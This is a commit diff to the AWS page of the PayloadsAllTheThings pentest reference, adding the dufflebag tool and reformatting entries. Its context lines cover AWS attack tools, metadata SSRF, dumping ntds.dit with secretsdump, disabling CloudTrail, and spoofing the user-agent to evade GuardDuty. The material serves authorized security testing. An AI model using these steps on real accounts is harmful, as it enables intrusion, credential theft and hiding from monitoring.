mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add dufflebag tool and cleanup
This commit is contained in:
parent
f7e8f515a5
commit
4b9baf37d3
@ -36,10 +36,8 @@
|
|||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
* **SkyArk** : Discover the most privileged users in the scanned AWS environment - including the AWS Shadow Admins.
|
* [SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins
|
||||||
Require:
|
* Requires read-Only permissions over IAM service
|
||||||
- Read-Only permissions over IAM service
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ git clone https://github.com/cyberark/SkyArk
|
$ git clone https://github.com/cyberark/SkyArk
|
||||||
$ powershell -ExecutionPolicy Bypass -NoProfile
|
$ powershell -ExecutionPolicy Bypass -NoProfile
|
||||||
@ -52,10 +50,8 @@
|
|||||||
PS C> Scan-AWShadowAdmins
|
PS C> Scan-AWShadowAdmins
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Pacu** : Pacu allows penetration testers to exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set.
|
* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set
|
||||||
Require:
|
* Requires AWS Keys
|
||||||
- AWS Keys
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ git clone https://github.com/RhinoSecurityLabs/pacu
|
$ git clone https://github.com/RhinoSecurityLabs/pacu
|
||||||
$ bash install.sh
|
$ bash install.sh
|
||||||
@ -68,7 +64,7 @@
|
|||||||
# https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
|
# https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Bucket Finder** : Search for readable buckets and list all the files in them https://digi.ninja/
|
* [Bucket Finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled
|
||||||
```powershell
|
```powershell
|
||||||
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
|
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
|
||||||
./bucket_finder.rb my_words
|
./bucket_finder.rb my_words
|
||||||
@ -83,7 +79,7 @@
|
|||||||
./bucket_finder.rb --log-file bucket.out my_words
|
./bucket_finder.rb --log-file bucket.out my_words
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Boto3** : Amazon Web Services (AWS) SDK for Python https://boto3.amazonaws.com/v1/documentation/api/latest/index.html
|
* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python
|
||||||
```python
|
```python
|
||||||
import boto3
|
import boto3
|
||||||
# Create an S3 client
|
# Create an S3 client
|
||||||
@ -96,9 +92,10 @@
|
|||||||
print(e)
|
print(e)
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Prowler** : AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100).
|
* [Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness
|
||||||
Require:
|
|
||||||
- arn:aws:iam::aws:policy/SecurityAudit
|
> It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100).
|
||||||
|
* Require: arn:aws:iam::aws:policy/SecurityAudit
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ pip install awscli ansi2html detect-secrets
|
$ pip install awscli ansi2html detect-secrets
|
||||||
@ -109,7 +106,7 @@
|
|||||||
$ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role
|
$ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Principal Mapper** : A tool for quickly evaluating IAM permissions in AWS
|
* [Principal Mapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS
|
||||||
```powershell
|
```powershell
|
||||||
https://github.com/nccgroup/PMapper
|
https://github.com/nccgroup/PMapper
|
||||||
pip install principalmapper
|
pip install principalmapper
|
||||||
@ -134,7 +131,7 @@
|
|||||||
pmapper argquery --principal '*' --resource user/PowerUser --preset connected
|
pmapper argquery --principal '*' --resource user/PowerUser --preset connected
|
||||||
```
|
```
|
||||||
|
|
||||||
* **ScoutSuite** : Multi-Cloud Security Auditing Tool https://github.com/nccgroup/ScoutSuite/wiki
|
* [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool
|
||||||
```powershell
|
```powershell
|
||||||
$ git clone https://github.com/nccgroup/ScoutSuite
|
$ git clone https://github.com/nccgroup/ScoutSuite
|
||||||
$ python scout.py PROVIDER --help
|
$ python scout.py PROVIDER --help
|
||||||
@ -143,23 +140,23 @@
|
|||||||
$ python scout.py azure --cli
|
$ python scout.py azure --cli
|
||||||
```
|
```
|
||||||
|
|
||||||
* **s3_objects_check** : Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files
|
* [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files
|
||||||
```powershell
|
```powershell
|
||||||
$ git clone https://github.com/nccgroup/s3_objects_check && cd s3_objects_check
|
$ git clone https://github.com/nccgroup/s3_objects_check
|
||||||
$ python3 -m venv env && source env/bin/activate
|
$ python3 -m venv env && source env/bin/activate
|
||||||
$ pip install -r requirements.txt
|
$ pip install -r requirements.txt
|
||||||
$ python s3-objects-check.py -h
|
$ python s3-objects-check.py -h
|
||||||
$ python s3-objects-check.py -p whitebox-profile -e blackbox-profile
|
$ python s3-objects-check.py -p whitebox-profile -e blackbox-profile
|
||||||
```
|
```
|
||||||
|
|
||||||
* **weirdAAL** : AWS Attack Library https://github.com/carnal0wnage/weirdAAL/wiki
|
* [weirdAAL](https://github.com/carnal0wnage/weirdAAL/wiki) - AWS Attack Library
|
||||||
```powershell
|
```powershell
|
||||||
python3 weirdAAL.py -m ec2_describe_instances -t demo
|
python3 weirdAAL.py -m ec2_describe_instances -t demo
|
||||||
python3 weirdAAL.py -m lambda_get_account_settings -t demo
|
python3 weirdAAL.py -m lambda_get_account_settings -t demo
|
||||||
python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo
|
python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo
|
||||||
```
|
```
|
||||||
|
|
||||||
* **cloudmapper** : CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
|
* [cloudmapper](https://github.com/duo-labs/cloudmapper.git) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/duo-labs/cloudmapper.git
|
git clone https://github.com/duo-labs/cloudmapper.git
|
||||||
# sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli
|
# sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli
|
||||||
@ -174,6 +171,9 @@
|
|||||||
find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges
|
find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS’s “public” mode
|
||||||
|
|
||||||
|
|
||||||
## AWS Patterns
|
## AWS Patterns
|
||||||
| Service | URL |
|
| Service | URL |
|
||||||
|-------------|--------|
|
|-------------|--------|
|
||||||
@ -205,7 +205,7 @@
|
|||||||
|
|
||||||
## AWS - Metadata SSRF
|
## AWS - Metadata SSRF
|
||||||
|
|
||||||
> AWS released an additional security defences against the attack.
|
> AWS released additional security defences against the attack.
|
||||||
|
|
||||||
:warning: Only working with IMDSv1.
|
:warning: Only working with IMDSv1.
|
||||||
Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
|
Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
|
||||||
@ -421,20 +421,19 @@ https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Dest
|
|||||||
|
|
||||||
:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
|
:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
|
||||||
|
|
||||||
Step 1: Head over to EC2 –> Volumes and create a new volume of your preferred size and type.
|
1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type.
|
||||||
Step 2: Select the created volume, right click and select the "attach volume" option.
|
2. Select the created volume, right click and select the "attach volume" option.
|
||||||
Step 3: Select the instance from the instance text box as shown below : `attach ebs volume`
|
3. Select the instance from the instance text box as shown below : `attach ebs volume`
|
||||||
```powershell
|
```powershell
|
||||||
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
|
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
|
||||||
aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device
|
aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device
|
||||||
```
|
```
|
||||||
|
4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk`
|
||||||
Step 4: Now, login to your ec2 instance and list the available disks using the following command : `lsblk`
|
5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf`
|
||||||
Step 5: Check if the volume has any data using the following command : `sudo file -s /dev/xvdf`
|
6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf`
|
||||||
Step 6: Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf`
|
7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume`
|
||||||
Step 7: Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume`
|
8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/`
|
||||||
Step 8: Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/`
|
9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .`
|
||||||
Step 9: cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .`
|
|
||||||
|
|
||||||
|
|
||||||
## AWS - Copy EC2 using AMI Image
|
## AWS - Copy EC2 using AMI Image
|
||||||
@ -541,7 +540,6 @@ Prerequisite:
|
|||||||
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
|
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
|
||||||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||||
|
|
||||||
|
|
||||||
## Disable CloudTrail
|
## Disable CloudTrail
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -560,12 +558,11 @@ Disable Cloud Trail on specific regions
|
|||||||
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
|
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||||||
|
|
||||||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||||||
|
|
||||||
Pacu bypass this problem by defining a custom User-agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473)
|
Pacu bypass this problem by defining a custom User-Agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473)
|
||||||
|
|
||||||
```python
|
```python
|
||||||
boto3_session = boto3.session.Session()
|
boto3_session = boto3.session.Session()
|
||||||
@ -575,37 +572,6 @@ if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): #
|
|||||||
self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
|
self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
|
||||||
```
|
```
|
||||||
|
|
||||||
### PenTest:IAMUser/KaliLinux
|
|
||||||
|
|
||||||
#### Finding description
|
|
||||||
|
|
||||||
**An API was invoked from a Kali Linux EC2 instance\.**
|
|
||||||
|
|
||||||
This finding informs you that a machine running Kali Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Kali Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
|
|
||||||
|
|
||||||
#### Default severity: Medium
|
|
||||||
|
|
||||||
### PenTest:IAMUser/ParrotLinux
|
|
||||||
|
|
||||||
#### Finding description
|
|
||||||
|
|
||||||
**An API was invoked from a Parrot Security Linux EC2 instance\.**
|
|
||||||
|
|
||||||
This finding informs you that a machine running Parrot Security Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Parrot Security Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
|
|
||||||
|
|
||||||
#### Default severity: Medium
|
|
||||||
|
|
||||||
### PenTest:IAMUser/PentooLinux
|
|
||||||
|
|
||||||
#### Finding description
|
|
||||||
|
|
||||||
**An API was invoked from a Pentoo Linux EC2 instance\.**
|
|
||||||
|
|
||||||
This finding informs you that a machine running Pentoo Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Pentoo Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
|
|
||||||
|
|
||||||
#### Default severity: Medium<a name="pentest3_severity"></a>
|
|
||||||
|
|
||||||
|
|
||||||
## Security checks
|
## Security checks
|
||||||
|
|
||||||
https://github.com/DenizParlak/Zeus
|
https://github.com/DenizParlak/Zeus
|
||||||
@ -658,7 +624,6 @@ https://github.com/DenizParlak/Zeus
|
|||||||
* Ensure a log metric filter and alarm exist for route table changes
|
* Ensure a log metric filter and alarm exist for route table changes
|
||||||
* Ensure a log metric filter and alarm exist for VPC changes
|
* Ensure a log metric filter and alarm exist for VPC changes
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [An introduction to penetration testing AWS - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-aws/)
|
* [An introduction to penetration testing AWS - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-aws/)
|
||||||
|
Loading…
Reference in New Issue
Block a user